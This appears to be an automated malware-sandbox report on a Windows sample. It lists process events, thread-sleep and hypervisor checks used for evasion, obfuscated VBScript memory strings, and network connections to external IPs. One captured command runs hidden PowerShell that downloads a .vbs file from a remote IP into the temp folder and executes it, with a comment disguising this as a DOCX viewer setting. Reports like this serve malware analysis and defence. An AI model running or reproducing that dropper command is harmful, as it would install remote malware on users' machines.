Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4988			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4730			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep count: 4988 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep count: 4730 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3340	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3000	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4452	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Windows\SysWOW64\cmd.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapterhZ
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapterhZ
Source: powershell.exe, 00000009.00000002.1261725593.0000000008142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: wscript.exe, 00000015.00000002.2822165448.000001EBB40DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2
Source: svchost.exe, 0000000A.00000002.2824469164.0000022923059000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.2822165448.000001EBB40DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $?r#MSFT_NetEventVmNetworkAdatper.cdxmlhZ
Source: wscript.exe, 00000015.00000002.2822660613.000001EBB427A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bFZzTJiVAjyWAHWvvmCivFmqWtPEzeRPJnlbiVJvPgpJBLhDloSbD = VnvN(109) + VnvN(66) + VnvN(66) + VnvN(114) + VnvN(74) + VnvN(71) + VnvN(68) + VnvN(73) + VnvN(68) + VnvN(118) + VnvN(109) + VnvN(86) + VnvN(120) + VnvN(117) + VnvN(85) + VnvN(122) + VnvN(81) + VnvN(79) + VnvN(121) + VnvN(76) + VnvN(112) + VnvN(86) + VnvN(71) + VnvN(98) + VnvN(117) + VnvN(73) + VnvN(119) + VnvN(75) + VnvN(103) + VnvN(100) + VnvN(119) + VnvN(111) + VnvN(90) + VnvN(98) + VnvN(70) + VnvN(109) + VnvN(118) + VnvN(83) + VnvN(108) + VnvN(107) + VnvN(97)
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $?r+MSFT_NetEventVmNetworkAdatper.format.ps1xmlhZ
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapterhZ
Source: wscript.exe, 00000015.00000002.2820821373.000001EBB21AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hWnhNMZJHHnOzKcXjIvMcIACUoeXHxnSkAvgTpoycBZBT = VnvN(76) + VnvN(119) + VnvN(121) + VnvN(83) + VnvN(90) + VnvN(86) + VnvN(77) + VnvN(98) + VnvN(118) + VnvN(80) + VnvN(73) + VnvN(65) + VnvN(108) + VnvN(82) + VnvN(114) + VnvN(87) + VnvN(85) + VnvN(106) + VnvN(104) + VnvN(106) + VnvN(75) + VnvN(79) + VnvN(66) + VnvN(66) + VnvN(118) + VnvN(112) + VnvN(122) + VnvN(99) + VnvN(82) + VnvN(68) + VnvN(86) + VnvN(111) + VnvN(73) + VnvN(65) + VnvN(69) + VnvN(117) + VnvN(69) + VnvN(80) + VnvN(105) + VnvN(78) + VnvN(102)
Source: powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 0000000A.00000002.2822456055.000002291DA2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000009.00000002.1249559562.0000000004F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: powershell.exe, 00000009.00000002.1257880980.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 3.5.129.15 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 3.128.172.139 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
